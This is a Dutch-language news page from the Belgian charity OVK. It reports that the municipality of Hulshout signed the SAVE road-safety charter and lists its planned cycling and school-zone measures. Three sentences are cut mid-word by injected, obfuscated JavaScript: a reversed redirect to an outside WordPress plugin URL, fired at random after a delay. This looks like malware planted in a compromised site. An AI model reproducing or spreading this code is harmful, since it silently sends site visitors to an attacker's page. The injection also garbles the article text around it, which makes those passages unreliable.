Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Hulshout ondertekent het SAVE-charter

Op maandag 18 januari ondertekende Hulshout het SAVE-charter Steden & Gemeenten. De ondertekening in Hulshout is ondertussen al de 63e in Vlaanderen en de 20e in de provincie Antwerpen. De politie koos er in Hulshout voor om het charter niet mee te ondertekenen.

Maar dat wil niet zeggen dat de ondertekening van het SAVE-charter voor Hulshout minder belangrijk is. Ze willen aan de ene kant de acties die de gemeente onderneemt op vlak van verkeersveiligheid benadrukken. Zo werden er al enkele acties rond verkeersveiligheid voor de zwakke weggebruiker uitgevoerd zoals bv. verbeteren fietspad in de Vennekensstraat, de huidige werken aan een nieuw fietspad tussen Houtvenne en Hulshout, plaatsen van snelheidsinformatieborden…

Meer dan alleen bekend maken wat er al gebeurt, wil Hulshout met deze ondertekening toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonen dat ze zullen blijven instaan voor en werken aan verkeersveiligheid met steeds het STOP-principe in het achterhoofd. In hun SAVE-actieplan zijn onder andere volgende acties opgenomen: openen van enkele trage wegen, beveiligen nieuwe fietsoversteken op de N15 (tussen Vannekensstraat en Linieweg) en de Grote Baan (en Vaartstraat), analyse verkeersveiligheid in schoolomgevingen en aanpak van de schoolomgeving in de Strepestraat, deelname aan Car Free Day…

Hulshout omschrijft hun deelname zelf als volgt: “De vernieuwde focus en nieuwe inzichten die de samenwerking met OVK toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot stand brengen, kunnen bestaande projecten verbeteren en leiden toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot het leggen van andere accenten. Ook in het kader van sensibiliseren en communiceren rond mobiliteit en veiligheid kan de gemeente nog bijleren en uitbreiden.

Ook de lokale tvzender RTV was aanwezig in Hulshout. Klik hier om hun videoverslag te bekijken.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be